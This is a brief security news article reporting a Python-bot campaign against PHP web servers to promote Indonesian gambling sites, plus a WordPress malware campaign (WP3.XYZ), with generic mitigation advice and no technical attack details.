New Botnet Campaign Targets PHP-Based Web Servers in Indonesia
Date: January 17, 2025
Author: Ravie Lakshmanan
Categories: Web Security, Botnet
A New Botnet Campaign Targets PHP-Based Web Servers in Indonesia
Cybersecurity researchers have exposed a new campaign that targets web servers running PHP-based applications to promote gambling platforms in Indonesia. Over the past two months, a significant volume of attacks from Python-based bots has been observed, suggesting a coordinated effort to exploit thousands of web apps.
According to Imperva researcher Daniel Johnston, "These attacks appear tied to the proliferation of gambling-related sites, potentially as a response to the pktoto[.]cc," a known Indonesian gambling site. Johnston further stated, "Over the past two months, a significant volume of attacks from Python-based bots has been observed, suggesting a coordinated effort to exploit thousands of web apps."
Malware Campaign Revealed
Recently, a widespread malware campaign was revealed that has targeted over 5,000 sites globally to create unauthorized administrator accounts, install a malicious plugin from a remote server, and siphon credential data back to it. The exact initial access vector used to deploy the JavaScript malware on these sites is presently not known. The malware has been codenamed WP3.XYZ in reference to the domain name that’s associated with the server used to fetch the plugin and exfiltrate data ("wp3[.]xyz").
Mitigation Measures
To mitigate against the attack, it’s recommended that WordPress site owners keep their plugins up-to-date, block the rogue domain using a firewall, scan for suspicious admin accounts or plugins, and remove them.
Stay Informed
Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.
